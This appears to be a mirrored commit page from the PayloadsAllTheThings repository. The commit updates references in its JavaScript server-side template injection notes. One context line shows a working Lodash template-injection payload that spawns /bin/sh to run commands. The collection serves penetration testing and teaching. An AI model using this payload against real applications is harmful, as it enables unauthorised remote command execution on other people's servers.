gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-30 06:30:27 -08:00
Code Issues Packages Projects Releases Wiki Activity

SSTI references updates

Browse Source
This commit is contained in:
Swissky
2024-11-03 20:54:01 +01:00
parent 51fe542992
commit 21dfd91180
9 changed files with 56 additions and 35 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
Server Side Template Injection/JavaScript.md
View File

@@ -8,7 +8,7 @@
- [Lodash](#Lodash)
- [Lodash - Basic Injection](#lodash---basic-injection)
- [Lodash - Command Execution](#lodash---command-execution)
- [References](#references)
## Templating Libraries
@@ -104,5 +104,8 @@ ${= _.VERSION}
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
```
---
## References
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)